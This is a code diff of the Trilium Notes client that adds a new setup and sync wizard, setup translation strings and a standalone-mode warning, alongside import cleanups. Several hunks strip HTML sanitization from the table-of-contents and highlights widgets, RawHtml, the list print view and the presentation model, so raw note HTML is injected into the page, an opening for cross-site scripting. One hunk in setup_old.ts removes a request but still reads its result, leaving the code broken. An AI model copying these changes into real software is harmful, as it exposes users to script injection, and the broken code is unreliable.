+    }, [stats.initialized]);
+
+    const steps: { key: SyncStep; label: string }[] = [
+        { key: "connecting", label: t("setup.sync-step-connecting") },
+        { key: "syncing", label: t("setup.sync-step-syncing") },
+        { key: "finalizing", label: t("setup.sync-step-finalizing") }
+    ];
+
+    const currentIndex = steps.findIndex((s) => s.key === step);
+
+    const progress = stats.totalPullCount
+        ? Math.round(((stats.totalPullCount - stats.outstandingPullCount) / stats.totalPullCount) * 100)
+        : 0;
+
+    return (
+        <div class="page sync-in-progress">
+            <SyncIllustration targetDevice={device} />
+            <h1>{t("setup.sync-in-progress-title")}</h1>
+
+            <main>
+                <Card className="sync-steps">
+                    {steps.map((s, i) => (
+                        <CardSection className={i < currentIndex ? "completed" : i === currentIndex ? "active" : ""} key={s.key}>
+                            <Icon icon={i < currentIndex ? "bx bx-check-circle" : i === currentIndex ? "bx bx-loader-circle bx-spin" : "bx bx-circle"} />{" "}
+                            {s.label}
+                            {s.key === "syncing" && (
+                                <div class="sync-progress">
+                                    <progress value={stats.totalPullCount! - stats.outstandingPullCount} max={stats.totalPullCount!} />
+                                    <span>{progress}%</span>
+                                </div>
+                            )}
+                        </CardSection>
+                    ))}
+                </Card>
+            </main>
+        </div>
+    );
+}
+
+function useOutstandingSyncInfo() {
+    const [ outstandingPullCount, setOutstandingPullCount ] = useState(0);
+    const [ totalPullCount, setTotalPullCount ] = useState<number | null>(null);
+    const [ initialized, setInitialized ] = useState(false);
+
+    async function refresh() {
+        const resp = await server.get<{ outstandingPullCount: number; totalPullCount: number | null; initialized: boolean }>("sync/stats");
+        setOutstandingPullCount(resp.outstandingPullCount);
+        setTotalPullCount(resp.totalPullCount);
+        setInitialized(resp.initialized);
+    }
+
+    useEffect(() => {
+        const interval = setInterval(refresh, 1000);
+        refresh();
+
+        return () => clearInterval(interval);
+    }, []);
+    return { outstandingPullCount, totalPullCount, initialized };
+}
+
+function Spinner() {
+    return (
+        <div class="lds-ring" style="margin-right: 20px;">
+            <div />
+            <div />
+            <div />
+            <div />
+        </div>);
+}
+
+function CreateNewDocument() {
+    useEffect(() => {
+        server.post("setup/new-document").then(() => {
+            location.reload();
+        });
+    }, []);
+
+    return (<div class="page create-new-document">
+        <h1>{t("setup.create-new-document-title")}</h1>
+        <p>{t("setup.create-new-document-description")}</p>
+
+        <Spinner />
+    </div>);
+}
+
+function SyncFromServer({ setState }: { setState: (state: State) => void }) {
+    const [ syncServerHost, setSyncServerHost ] = useState("");
+    const [ password, setPassword ] = useState("");
+    const [ syncProxy, setSyncProxy ] = useState("");
+    const [ error, setError ] = useState<string | null>(null);
+    const isValid = syncServerHost.trim() !== "" && password !== "";
+
+    async function handleFinishSetup() {
+        try {
+            const resp = await server.post<SetupSyncFromServerResponse>("setup/sync-from-server", {
+                syncServerHost: syncServerHost.trim(),
+                syncProxy: syncProxy.trim(),
+                password
+            });
+
+            if (resp.result === "success") {
+                setState("syncInProgress");
+            } else {
+                setError(t("setup.sync-failed", { message: resp.error }));
+            }
+        } catch (e) {
+            setError(e instanceof Error ? e.message : String(e));
+        }
+    }
+
+    return (
+        <div class="page sync-from-server">
+            <SyncIllustration targetDevice="server" />
+            <h1>{t("setup.sync-from-server")}</h1>
+            <p>{t("setup.sync-from-server-page-description")}</p>
+
+            <main>
+                <form>
+                    <FormItemWithIcon icon="bx bx-server">
+                        <FormTextBox placeholder="https://example.com" currentValue={syncServerHost} onChange={setSyncServerHost} required />
+                    </FormItemWithIcon>
+
+                    <FormItemWithIcon icon="bx bx-lock">
+                        <FormTextBox placeholder={t("setup.password-placeholder")} type="password" currentValue={password} onChange={setPassword} required />
+                    </FormItemWithIcon>
+
+                    <Collapsible title={t("setup.advanced-options")} initiallyExpanded={false}>
+                        <FormItemWithIcon icon="bx bx-shape-polygon">
+                            <FormTextBox placeholder="http://my-proxy.com:8080" currentValue={syncProxy} onChange={setSyncProxy} />
+                        </FormItemWithIcon>
+                    </Collapsible>
+
+                    {error && <Admonition className="error" type="caution">{replaceHtmlEscapedSlashes(error)}</Admonition>}
+                </form>
+            </main>
+
+            <footer>
+                <Button text={t("setup.button-back")} onClick={() => setState("firstOptions")} kind="lowProfile" />
+                <Button text={t("setup.button-finish-setup")} kind="primary" onClick={handleFinishSetup} disabled={!isValid} />
+            </footer>
+        </div>
+    );
+}
+
+function SyncFromDesktop({ setState }: { setState: (state: State) => void }) {
+    function handleFinishSetup() {
+    }
+
+    return (
+        <div class="page sync-from-desktop">
+            <SyncIllustration targetDevice="desktop" />
+            <h1>{t("setup.sync-from-desktop")}</h1>
+
+            <main>
+                <Card heading="On the other device">
+                    <CardSection>1. {t("setup.sync-from-desktop-step1")}</CardSection>
+                    <CardSection>2. {t("setup.sync-from-desktop-step2")}</CardSection>
+                    <CardSection>3. {t("setup.sync-from-desktop-step3")}</CardSection>
+                    <CardSection>4. {t("setup.sync-from-desktop-step4", { host: location.host })}</CardSection>
+                    <CardSection>5. {t("setup.sync-from-desktop-step5")}</CardSection>
+
+                    {t("setup.sync-from-desktop-final")}
+                </Card>
+            </main>
+
+            <footer>
+                <Button text={t("setup.button-back")} onClick={() => setState("firstOptions")} kind="lowProfile" />
+                <Button icon="bx-loader bx-spin" text={t("setup.sync-from-desktop-waiting")} kind="primary" disabled />
+            </footer>
+        </div>
+    );
+}
+
+function SyncIllustration({ targetDevice }: { targetDevice: "desktop" | "server" }) {
+    return (
+        <div class="sync-illustration">
+            <div>
+                <Icon icon="bx bx-globe" />
+                {t("setup.sync-illustration-this-device")}
+            </div>
+            <div class="sync-illustration-arrows" />
+            <div>
+                <Icon icon={targetDevice === "desktop" ? "bx bx-desktop" : "bx bx-server"} />
+                {targetDevice === "desktop" ? t("setup.sync-illustration-desktop-app") : t("setup.sync-illustration-server")}
+            </div>
+        </div>
+    );
+}
+
+function FormItemWithIcon({ icon, children }: { icon: string; children: ComponentChildren }) {
+    return (
+        <div class="form-item-with-icon">
+            <Icon icon={icon} />
+            {children}
+        </div>
+    );
+}
+
+function SetupOptionCard({ title, description, icon, onClick }: { title: string; description: string, icon: string, onClick?: () => void }) {
+    return (
+        <CardFrame className="setup-option-card" onClick={onClick}>
+            <Icon icon={icon} />
+
+            <div>
+                <h3>{title}</h3>
+                <p>{description}</p>
+            </div>
+        </CardFrame>
+    );
+}
+
+main();

apps/client/src/setup_old.ts

@@ -15,7 +15,6 @@ class SetupController {
     private setupTypeNextButton: HTMLButtonElement;
     private setupTypeInputs: HTMLInputElement[];
     private syncServerHostInput: HTMLInputElement;
-    private syncProxyInput: HTMLInputElement;
     private passwordInput: HTMLInputElement;
     private sections: Record<SetupStep, HTMLElement>;
 
@@ -27,7 +26,6 @@ class SetupController {
         this.setupTypeNextButton = mustGetElement("setup-type-next", HTMLButtonElement);
         this.setupTypeInputs = Array.from(document.querySelectorAll<HTMLInputElement>("input[name='setup-type']"));
         this.syncServerHostInput = mustGetElement("sync-server-host", HTMLInputElement);
-        this.syncProxyInput = mustGetElement("sync-proxy", HTMLInputElement);
         this.passwordInput = mustGetElement("password", HTMLInputElement);
         this.sections = {
             "setup-type": mustGetElement("setup-type-section", HTMLElement),
@@ -103,23 +101,6 @@ class SetupController {
         const syncProxy = this.syncProxyInput.value.trim();
         const password = this.passwordInput.value;
 
-        if (!syncServerHost) {
-            showAlert("Trilium server address can't be empty");
-            return;
-        }
-
-        if (!password) {
-            showAlert("Password can't be empty");
-            return;
-        }
-
-        // not using server.js because it loads too many dependencies
-        const resp = await $.post("api/setup/sync-from-server", {
-            syncServerHost,
-            syncProxy,
-            password
-        });
-
         if (resp.result === "success") {
             hideAlert();
             this.setStep("sync-in-progress");
@@ -145,14 +126,6 @@ class SetupController {
     private getSelectedSetupType(): SetupType {
         return (this.setupTypeInputs.find((input) => input.checked)?.value ?? "") as SetupType;
     }
-
-    private startSyncPolling() {
-        if (this.syncPollIntervalId !== null) {
-            return;
-        }
-
-        this.syncPollIntervalId = window.setInterval(checkOutstandingSyncs, 1000);
-    }
 }
 
 async function checkOutstandingSyncs() {

apps/client/src/translations/en/translation.json

@@ -2230,5 +2230,41 @@
     "sample_xy": "XY",
     "sample_venn": "Venn",
     "sample_ishikawa": "Ishikawa"
+  },
+  "setup": {
+    "heading": "Trilium Notes setup",
+    "new-document": "New document",
+    "new-document-description": "Start with a clean workspace and begin immediately.",
+    "sync-from-desktop": "Connect a desktop app",
+    "sync-from-desktop-description": "You only have a Trilium desktop app running on another device. This device will sync its data from that desktop app.",
+    "sync-from-server": "Connect to an existing server",
+    "sync-from-server-description": "You have a Trilium server running elsewhere (either self-hosted or in the cloud). This device will sync its data from that server.",
+    "next": "Next",
+    "init-in-progress": "Document initialization in progress",
+    "redirecting": "You will be shortly redirected to the application.",
+    "title": "Setup",
+    "sync-from-server-page-description": "Enter your server details below to connect your existing workspace.",
+    "sync-in-progress-title": "Sync in progress",
+    "sync-in-progress-description": "Your device is now connected and items are being synchronized.",
+    "password-placeholder": "Password",
+    "button-back": "Back",
+    "button-finish-setup": "Finish setup",
+    "sync-step-connecting": "Connecting to server",
+    "sync-step-syncing": "Syncing data",
+    "sync-step-finalizing": "Setting up options",
+    "create-new-document-title": "Preparing your new document",
+    "create-new-document-description": "You’ll be redirected automatically in a moment.",
+    "sync-illustration-this-device": "This device",
+    "sync-illustration-desktop-app": "Desktop app",
+    "sync-illustration-server": "Sync server",
+    "sync-from-desktop-step1": "Open your desktop instance of Trilium Notes.",
+    "sync-from-desktop-step2": "From the Trilium Menu, click Options.",
+    "sync-from-desktop-step3": "Click on Sync category in the note tree.",
+    "sync-from-desktop-step4": "Change server instance address to: {{- host}} and click Save.",
+    "sync-from-desktop-step5": "Click \"Test sync\" button to verify connection is successful.",
+    "sync-from-desktop-final": "Once you've completed these steps, you can proceed to the next step.",
+    "sync-from-desktop-waiting": "Waiting for connection...",
+    "advanced-options": "Advanced options",
+    "sync-failed": "Failed to sync: {{message}}"
   }
 }

apps/client/src/types.d.ts

@@ -1,4 +1,4 @@
-import { IconRegistry, Locale } from "@triliumnext/commons";
+import { BootstrapDefinition } from "@triliumnext/commons";
 
 import appContext, { AppContext } from "./components/app_context";
 import type FNote from "./entities/fnote";
@@ -15,10 +15,9 @@ interface ElectronProcess {
     platform: string;
 }
 
-interface CustomGlobals {
+interface CustomGlobals extends BootstrapDefinition {
     isDesktop: typeof utils.isDesktop;
     isMobile: typeof utils.isMobile;
-    device: "mobile" | "desktop" | "print";
     getComponentByEl: typeof appContext.getComponentByEl;
     getHeaders: typeof server.getHeaders;
     getReferenceLinkTitle: (href: string) => Promise<string>;
@@ -31,32 +30,7 @@ interface CustomGlobals {
     SEARCH_HELP_TEXT: string;
     activeDialog: JQuery<HTMLElement> | null;
     componentId: string;
-    csrfToken: string;
-    baseApiUrl: string;
-    isProtectedSessionAvailable: boolean;
-    isDev: boolean;
-    isMainWindow: boolean;
-    maxEntityChangeIdAtLoad: number;
-    maxEntityChangeSyncIdAtLoad: number;
-    assetPath: string;
-    appPath: string;
-    instanceName: string;
-    appCssNoteIds: string[];
-    triliumVersion: string;
-    TRILIUM_SAFE_MODE: boolean;
-    platform?: typeof process.platform;
     linter: typeof lint;
-    hasNativeTitleBar: boolean;
-    hasBackgroundEffects: boolean;
-    isElectron: boolean;
-    isRtl: boolean;
-    iconRegistry: IconRegistry;
-    themeCssUrl: string;
-    themeUseNextAsBase?: "next" | "next-light" | "next-dark";
-    iconPackCss: string;
-    headingStyle: "plain" | "underline" | "markdown";
-    layoutOrientation: "vertical" | "horizontal";
-    currentLocale: Locale;
 }
 
 type RequireMethod = (moduleName: string) => any;

apps/client/src/widgets/attribute_widgets/UserAttributesList.tsx

@@ -1,14 +1,16 @@
-import { useState } from "preact/hooks";
-import FNote from "../../entities/fnote";
 import "./UserAttributesList.css";
-import { useTriliumEvent } from "../react/hooks";
-import attributes from "../../services/attributes";
-import { DefinitionObject } from "../../services/promoted_attribute_definition_parser";
-import { formatDateTime } from "../../utils/formatters";
+
+import type { DefinitionObject } from "@triliumnext/commons";
 import { ComponentChildren, CSSProperties } from "preact";
+import { useState } from "preact/hooks";
+
+import FNote from "../../entities/fnote";
+import attributes from "../../services/attributes";
+import { getReadableTextColor } from "../../services/css_class_manager";
+import { formatDateTime } from "../../utils/formatters";
+import { useTriliumEvent } from "../react/hooks";
 import Icon from "../react/Icon";
 import NoteLink from "../react/NoteLink";
-import { getReadableTextColor } from "../../services/css_class_manager";
 
 interface UserAttributesListProps {
     note: FNote;
@@ -29,7 +31,7 @@ export default function UserAttributesDisplay({ note, ignoredAttributes }: UserA
         <div className="user-attributes">
             {userAttributes?.map(attr => buildUserAttribute(attr))}
         </div>
-    )
+    );
 
 }
 
@@ -46,13 +48,13 @@ function useNoteAttributesWithDefinitions(note: FNote, attributesToIgnore:  stri
 }
 
 function UserAttribute({ attr, children, style }: { attr: AttributeWithDefinitions, children: ComponentChildren, style?: CSSProperties }) {
-    const className = `${attr.type === "label" ? "label" + " " + attr.def.labelType : "relation"}`;
+    const className = attr.type === "label" ? `label ${attr.def.labelType}` : "relation";
 
     return (
         <span key={attr.friendlyName} className={`user-attribute type-${className}`} style={style}>
             {children}
         </span>
-    )
+    );
 }
 
 function buildUserAttribute(attr: AttributeWithDefinitions): ComponentChildren {
@@ -61,7 +63,7 @@ function buildUserAttribute(attr: AttributeWithDefinitions): ComponentChildren {
     let style: CSSProperties | undefined;
 
     if (attr.type === "label") {
-        let value = attr.value;
+        const value = attr.value;
         switch (attr.def.labelType) {
             case "number":
                 let formattedValue = value;
@@ -102,7 +104,7 @@ function buildUserAttribute(attr: AttributeWithDefinitions): ComponentChildren {
         content = <>{defaultLabel}<NoteLink notePath={attr.value} showNoteIcon /></>;
     }
 
-    return <UserAttribute attr={attr} style={style}>{content}</UserAttribute>
+    return <UserAttribute attr={attr} style={style}>{content}</UserAttribute>;
 }
 
 function getAttributesWithDefinitions(note: FNote, attributesToIgnore: string[] = []): AttributeWithDefinitions[] {

apps/client/src/widgets/buttons/global_menu.tsx

@@ -8,7 +8,7 @@ import { CommandNames } from "../../components/app_context";
 import Component from "../../components/component";
 import { ExperimentalFeature, ExperimentalFeatureId, experimentalFeatures, isExperimentalFeatureEnabled, toggleExperimentalFeature } from "../../services/experimental_features";
 import { t } from "../../services/i18n";
-import utils, { dynamicRequire, isElectron, isMobile, reloadFrontendApp } from "../../services/utils";
+import utils, { dynamicRequire, isElectron, isMobile, isStandalone, reloadFrontendApp } from "../../services/utils";
 import Dropdown from "../react/Dropdown";
 import { FormDropdownDivider, FormDropdownSubmenu, FormListHeader, FormListItem } from "../react/FormList";
 import { useStaticTooltip, useStaticTooltipWithKeyboardShortcut, useTriliumOption, useTriliumOptionBool, useTriliumOptionInt } from "../react/hooks";
@@ -251,7 +251,7 @@ function ToggleWindowOnTop() {
 function useTriliumUpdateStatus() {
     const [ latestVersion, setLatestVersion ] = useState<string>();
     const [ checkForUpdates ] = useTriliumOptionBool("checkForUpdates");
-    const isUpdateAvailable = utils.isUpdateAvailable(latestVersion, glob.triliumVersion);
+    const isUpdateAvailable = utils.isUpdateAvailable(latestVersion, window.glob.triliumVersion);
 
     async function updateVersionStatus() {
         const RELEASES_API_URL = "https://api.github.com/repos/TriliumNext/Trilium/releases/latest";
@@ -269,7 +269,7 @@ function useTriliumUpdateStatus() {
     }
 
     useEffect(() => {
-        if (!checkForUpdates) {
+        if (!checkForUpdates || !isStandalone) {
             setLatestVersion(undefined);
             return;
         }

apps/client/src/widgets/collections/legacy/ListPrintView.tsx

@@ -4,7 +4,6 @@ import type FNote from "../../../entities/fnote";
 import type { PrintReport } from "../../../print";
 import content_renderer from "../../../services/content_renderer";
 import froca from "../../../services/froca";
-import { sanitizeNoteContentHtml } from "../../../services/sanitize_content";
 import type { ViewModeProps } from "../interface";
 import { filterChildNotes, useFilteredNoteIds } from "./utils";
 
@@ -88,7 +87,7 @@ export function ListPrintView({ note, noteIds: unfilteredNoteIds, onReady, onPro
                 <h1>{note.title}</h1>
 
                 {state.notesWithContent?.map(({ note: childNote, contentEl }) => (
-                    <section id={`note-${childNote.noteId}`} class="note" dangerouslySetInnerHTML={{ __html: sanitizeNoteContentHtml(contentEl.innerHTML) }} />
+                    <section id={`note-${childNote.noteId}`} class="note" dangerouslySetInnerHTML={{ __html: contentEl.innerHTML }} />
                 ))}
             </div>
         </div>

apps/client/src/widgets/collections/presentation/model.ts

@@ -1,7 +1,6 @@
 import { NoteType } from "@triliumnext/commons";
 import FNote from "../../../entities/fnote";
 import contentRenderer from "../../../services/content_renderer";
-import { sanitizeNoteContentHtml } from "../../../services/sanitize_content";
 import { ProgressChangedFn } from "../interface";
 
 type DangerouslySetInnerHTML = { __html: string; };
@@ -73,7 +72,7 @@ async function processContent(note: FNote): Promise<DangerouslySetInnerHTML> {
     const { $renderedContent } = await contentRenderer.getRenderedContent(note, {
         noChildrenList: true
     });
-    return { __html: sanitizeNoteContentHtml($renderedContent.html()) };
+    return { __html: $renderedContent.html() };
 }
 
 async function postProcessSlides(slides: (PresentationSlideModel | PresentationSlideBaseModel)[]) {

apps/client/src/widgets/collections/table/columns.tsx

@@ -1,11 +1,12 @@
-import type { CellComponent, ColumnDefinition, EmptyCallback, FormatterParams, ValueBooleanCallback, ValueVoidCallback } from "tabulator-tables";
-import { LabelType } from "../../../services/promoted_attribute_definition_parser.js";
+import { LabelType } from "@triliumnext/commons";
 import { JSX } from "preact";
-import { renderReactWidget } from "../../react/react_utils.jsx";
-import Icon from "../../react/Icon.jsx";
 import { useEffect, useRef, useState } from "preact/hooks";
+import type { CellComponent, ColumnDefinition, EmptyCallback, FormatterParams, ValueBooleanCallback, ValueVoidCallback } from "tabulator-tables";
+
 import froca from "../../../services/froca.js";
+import Icon from "../../react/Icon.jsx";
 import NoteAutocomplete from "../../react/NoteAutocomplete.jsx";
+import { renderReactWidget } from "../../react/react_utils.jsx";
 
 type ColumnType = LabelType | "relation";
 
@@ -85,7 +86,7 @@ export function buildColumnDefinitions({ info, movableRows, existingColumnData,
             rowHandle: movableRows,
             width: calculateIndexColumnWidth(rowNumberHint, movableRows),
             formatter: wrapFormatter(({ cell, formatterParams }) => <div>
-                {(formatterParams as RowNumberFormatterParams).movableRows && <><span class="bx bx-dots-vertical-rounded"></span>{" "}</>}
+                {(formatterParams as RowNumberFormatterParams).movableRows && <><span class="bx bx-dots-vertical-rounded" />{" "}</>}
                 {cell.getRow().getPosition(true)}
             </div>),
             formatterParams: { movableRows } satisfies RowNumberFormatterParams
@@ -207,14 +208,14 @@ function wrapEditor(Component: (opts: EditorOpts) => JSX.Element): ((
     editorParams: {},
 ) => HTMLElement | false) {
     return (cell, _, success, cancel, editorParams) => {
-        const elWithParams = <Component cell={cell} success={success} cancel={cancel} editorParams={editorParams} />
+        const elWithParams = <Component cell={cell} success={success} cancel={cancel} editorParams={editorParams} />;
         return renderReactWidget(null, elWithParams)[0];
     };
 }
 
 function NoteFormatter({ cell }: FormatterOpts) {
     const noteId = cell.getValue();
-    const [ note, setNote ] = useState(noteId ? froca.getNoteFromCache(noteId) : null)
+    const [ note, setNote ] = useState(noteId ? froca.getNoteFromCache(noteId) : null);
 
     useEffect(() => {
         if (!noteId || note?.noteId === noteId) return;
@@ -238,5 +239,5 @@ function RelationEditor({ cell, success }: EditorOpts) {
             hideAllButtons: true
         }}
         noteIdChanged={success}
-    />
+    />;
 }

apps/client/src/widgets/collections/table/rows.ts

@@ -1,5 +1,7 @@
+import { LabelType } from "@triliumnext/commons";
+
 import FNote from "../../../entities/fnote.js";
-import { extractAttributeDefinitionTypeAndName, type LabelType } from "../../../services/promoted_attribute_definition_parser.js";
+import { extractAttributeDefinitionTypeAndName } from "../../../services/promoted_attribute_definition_parser.js";
 import type { AttributeDefinitionInformation } from "./columns.js";
 
 export type TableData = {
@@ -49,7 +51,7 @@ export async function buildRowDefinitions(parentNote: FNote, infos: AttributeDef
             isArchived: note.isArchived,
             branchId: branch.branchId,
             colorClass: note.getColorClass()
-        }
+        };
 
         if (note.hasChildren() && (maxDepth < 0 || currentDepth < maxDepth)) {
             const { definitions, rowNumber: subRowNumber } = (await buildRowDefinitions(note, infos, includeArchived, maxDepth, currentDepth + 1));

apps/client/src/widgets/dialogs/about.tsx

@@ -1,13 +1,14 @@
-import Modal from "../react/Modal.js";
+import type { AppInfo } from "@triliumnext/commons";
+import type { CSSProperties } from "preact/compat";
+import { useState } from "preact/hooks";
+
 import { t } from "../../services/i18n.js";
-import { formatDateTime } from "../../utils/formatters.js";
+import openService from "../../services/open.js";
 import server from "../../services/server.js";
 import utils from "../../services/utils.js";
-import openService from "../../services/open.js";
-import { useState } from "preact/hooks";
-import type { CSSProperties } from "preact/compat";
-import type { AppInfo } from "@triliumnext/commons";
+import { formatDateTime } from "../../utils/formatters.js";
 import { useTriliumEvent } from "../react/hooks.jsx";
+import Modal from "../react/Modal.js";
 
 export default function AboutDialog() {
     const [appInfo, setAppInfo] = useState<AppInfo | null>(null);
@@ -54,15 +55,15 @@ export default function AboutDialog() {
                     <tr>
                         <th>{t("about.build_revision")}</th>
                         <td className="selectable-text">
-                            {appInfo?.buildRevision && <a className="tn-link build-revision external" href={`https://github.com/TriliumNext/Trilium/commit/${appInfo.buildRevision}`} target="_blank" style={forceWordBreak}>{appInfo.buildRevision}</a>}
+                            {appInfo?.buildRevision && <a className="tn-link build-revision external" href={`https://github.com/TriliumNext/Trilium/commit/${appInfo.buildRevision}`} target="_blank" style={forceWordBreak} rel="noreferrer">{appInfo.buildRevision}</a>}
                         </td>
                     </tr>
-                    <tr>
+                    { appInfo?.dataDirectory && <tr>
                         <th>{t("about.data_directory")}</th>
                         <td className="data-directory">
                             {appInfo?.dataDirectory && (<DirectoryLink directory={appInfo.dataDirectory} style={forceWordBreak} />)}
                         </td>
-                    </tr>
+                    </tr>}
                 </tbody>
             </table>
         </Modal>
@@ -76,8 +77,8 @@ function DirectoryLink({ directory, style }: { directory: string, style?: CSSPro
             openService.openDirectory(directory);
         };
 
-        return <a className="tn-link selectable-text" href="#" onClick={onClick} style={style}>{directory}</a>
-    } else {
-        return <span className="selectable-text" style={style}>{directory}</span>;
-    }
+        return <a className="tn-link selectable-text" href="#" onClick={onClick} style={style}>{directory}</a>;
+    } 
+    return <span className="selectable-text" style={style}>{directory}</span>;
+    
 }

apps/client/src/widgets/dialogs/recent_changes.tsx

@@ -27,6 +27,7 @@ export default function RecentChangesDialog() {
     });
 
     useEffect(() => {
+        if (!ancestorNoteId) return;
         server.get<RecentChangeRow[]>(`recent-changes/${ancestorNoteId}`)
             .then(async (recentChanges) => {
                 // preload all notes into cache

apps/client/src/widgets/highlights_list.ts

@@ -13,27 +13,6 @@ import katex from "../services/math.js";
 import options from "../services/options.js";
 import OnClickButtonWidget from "./buttons/onclick_button.js";
 import RightPanelWidget from "./right_panel_widget.js";
-import DOMPurify from "dompurify";
-
-/**
- * DOMPurify configuration for highlight list items. Only allows inline
- * formatting tags that appear in highlighted text (bold, italic, underline,
- * colored/background-colored spans, KaTeX math output).
- */
-const HIGHLIGHT_PURIFY_CONFIG: DOMPurify.Config = {
-    ALLOWED_TAGS: [
-        "b", "i", "em", "strong", "u", "s", "del", "sub", "sup",
-        "code", "mark", "span", "abbr", "small", "a",
-        // KaTeX rendering output elements
-        "math", "semantics", "mrow", "mi", "mo", "mn", "msup",
-        "msub", "mfrac", "mover", "munder", "munderover",
-        "msqrt", "mroot", "mtable", "mtr", "mtd", "mtext",
-        "mspace", "annotation"
-    ],
-    ALLOWED_ATTR: ["class", "style", "href", "aria-hidden", "encoding", "xmlns"],
-    RETURN_DOM: false,
-    RETURN_DOM_FRAGMENT: false
-};
 
 const TPL = /*html*/`<div class="highlights-list-widget">
     <style>
@@ -276,7 +255,7 @@ export default class HighlightsListWidget extends RightPanelWidget {
 
             if (prevEndIndex !== -1 && startIndex === prevEndIndex) {
                 // If the previous element is connected to this element in HTML, then concatenate them into one.
-                $highlightsList.children().last().append(DOMPurify.sanitize(subHtml, HIGHLIGHT_PURIFY_CONFIG));
+                $highlightsList.children().last().append(subHtml);
             } else {
                 // TODO: can't be done with $(subHtml).text()?
                 //Can’t remember why regular expressions are used here, but modified to $(subHtml).text() works as expected
@@ -288,12 +267,12 @@ export default class HighlightsListWidget extends RightPanelWidget {
                     //If the two elements have the same style and there are only formulas in between, append the formulas and the current element to the end of the previous element.
                     if (this.areOuterTagsConsistent(prevSubHtml, subHtml) && onlyMathRegex.test(substring)) {
                         const $lastLi = $highlightsList.children("li").last();
-                        $lastLi.append(DOMPurify.sanitize(await this.replaceMathTextWithKatax(substring), HIGHLIGHT_PURIFY_CONFIG));
-                        $lastLi.append(DOMPurify.sanitize(subHtml, HIGHLIGHT_PURIFY_CONFIG));
+                        $lastLi.append(await this.replaceMathTextWithKatax(substring));
+                        $lastLi.append(subHtml);
                     } else {
                         $highlightsList.append(
                             $("<li>")
-                                .html(DOMPurify.sanitize(subHtml, HIGHLIGHT_PURIFY_CONFIG))
+                                .html(subHtml)
                                 .on("click", () => this.jumpToHighlightsList(findSubStr, hltIndex))
                         );
                     }

apps/client/src/widgets/layout/StandaloneWarningBar.tsx

@@ -0,0 +1,26 @@
+import { isMobile } from "../../services/utils";
+import Admonition from "../react/Admonition";
+
+export default function StandaloneWarningBar() {
+    return (
+        <div
+            className="standalone-warning-bar"
+            style={{
+                contain: "none"
+            }}
+        >
+            <Admonition
+                type="caution"
+                style={{
+                    margin: 0,
+                    fontSize: "0.8em"
+                }}
+            >
+                {isMobile()
+                    ? "Running Trilium standalone. Beware of data loss and other issues."
+                    : "You are running Trilium in standalone mode. Some features are not available, and you may experience issues or data loss. Use the desktop application or self-hosted server for the best experience."
+                }
+            </Admonition>
+        </div>
+    );
+}

apps/client/src/widgets/react/Admonition.tsx

@@ -1,15 +1,16 @@
-import { ComponentChildren } from "preact";
+import { HTML } from "mermaid/dist/diagram-api/types.js";
+import { ComponentChildren, HTMLAttributes } from "preact";
 
-interface AdmonitionProps {
+interface AdmonitionProps extends Pick<HTMLAttributes<HTMLDivElement>, "style"> {
     type: "warning" | "note" | "caution";
     children: ComponentChildren;
     className?: string;
 }
 
-export default function Admonition({ type, children, className }: AdmonitionProps) {
+export default function Admonition({ type, children, className, ...props }: AdmonitionProps) {
     return (
-        <div className={`admonition ${type} ${className}`} role="alert">
+        <div className={`admonition ${type} ${className}`} role="alert" {...props}>
             {children}
         </div>
-    )
+    );
 }

apps/client/src/widgets/react/Collapsible.tsx

@@ -43,13 +43,13 @@ export function ExternallyControlledCollapsible({ title, children, className, ex
                     setFullyExpanded(true);
                 }, 250);
                 return () => clearTimeout(timeout);
-            } else {
-                setFullyExpanded(true);
-            }
+            } 
+            setFullyExpanded(true);
+            
         } else {
             setFullyExpanded(false);
         }
-    }, [expanded, transitionEnabled])
+    }, [expanded, transitionEnabled]);
 
     return (
         <div className={clsx("collapsible", className, {
@@ -58,7 +58,10 @@ export function ExternallyControlledCollapsible({ title, children, className, ex
         })}>
             <button
                 className="collapsible-title tn-low-profile"
-                onClick={() => setExpanded(!expanded)}
+                onClick={(e) => {
+                    e.preventDefault();
+                    setExpanded(!expanded);
+                }}
                 aria-expanded={expanded}
                 aria-controls={contentId}
             >

apps/client/src/widgets/react/RawHtml.tsx

@@ -1,7 +1,5 @@
 import type { CSSProperties, HTMLProps, RefObject } from "preact/compat";
 
-import { sanitizeNoteContentHtml } from "../../services/sanitize_content.js";
-
 type HTMLElementLike = string | HTMLElement | JQuery<HTMLElement>;
 
 interface RawHtmlProps extends Pick<HTMLProps<HTMLElement>, "tabindex" | "dir"> {
@@ -38,6 +36,6 @@ export function getHtml(html: string | HTMLElement | JQuery<HTMLElement>) {
     }
 
     return {
-        __html: sanitizeNoteContentHtml(html as string)
+        __html: html as string
     };
 }

apps/client/src/widgets/toc.ts

@@ -21,27 +21,6 @@ import OnClickButtonWidget from "./buttons/onclick_button.js";
 import appContext, { type EventData } from "../components/app_context.js";
 import katex from "../services/math.js";
 import type FNote from "../entities/fnote.js";
-import DOMPurify from "dompurify";
-
-/**
- * DOMPurify configuration for ToC headings. Only allows inline formatting
- * tags that legitimately appear in headings (bold, italic, KaTeX math output).
- * Blocks all event handlers, script tags, and dangerous attributes.
- */
-const TOC_PURIFY_CONFIG: DOMPurify.Config = {
-    ALLOWED_TAGS: [
-        "b", "i", "em", "strong", "s", "del", "sub", "sup",
-        "code", "mark", "span", "abbr", "small",
-        // KaTeX rendering output elements
-        "math", "semantics", "mrow", "mi", "mo", "mn", "msup",
-        "msub", "mfrac", "mover", "munder", "munderover",
-        "msqrt", "mroot", "mtable", "mtr", "mtd", "mtext",
-        "mspace", "annotation"
-    ],
-    ALLOWED_ATTR: ["class", "style", "aria-hidden", "encoding", "xmlns"],
-    RETURN_DOM: false,
-    RETURN_DOM_FRAGMENT: false
-};
 
 const TPL = /*html*/`<div class="toc-widget">
     <style>
@@ -358,7 +337,7 @@ export default class TocWidget extends RightPanelWidget {
             //
 
             const headingText = await this.replaceMathTextWithKatax(m[2]);
-            const $itemContent = $('<div class="item-content">').html(DOMPurify.sanitize(headingText, TOC_PURIFY_CONFIG));
+            const $itemContent = $('<div class="item-content">').html(headingText);
             const $li = $("<li>").append($itemContent)
                 .on("click", () => this.jumpToHeading(headingIndex));
             $ols[$ols.length - 1].append($li);

apps/client/src/widgets/type_widgets/text/snippets.ts

@@ -3,7 +3,6 @@ import froca from "../../../services/froca.js";
 import type LoadResults from "../../../services/load_results.js";
 import search from "../../../services/search.js";
 import type { TemplateDefinition } from "@triliumnext/ckeditor5";
-import appContext from "../../../components/app_context.js";
 import type FNote from "../../../entities/fnote.js";
 
 interface TemplateData {
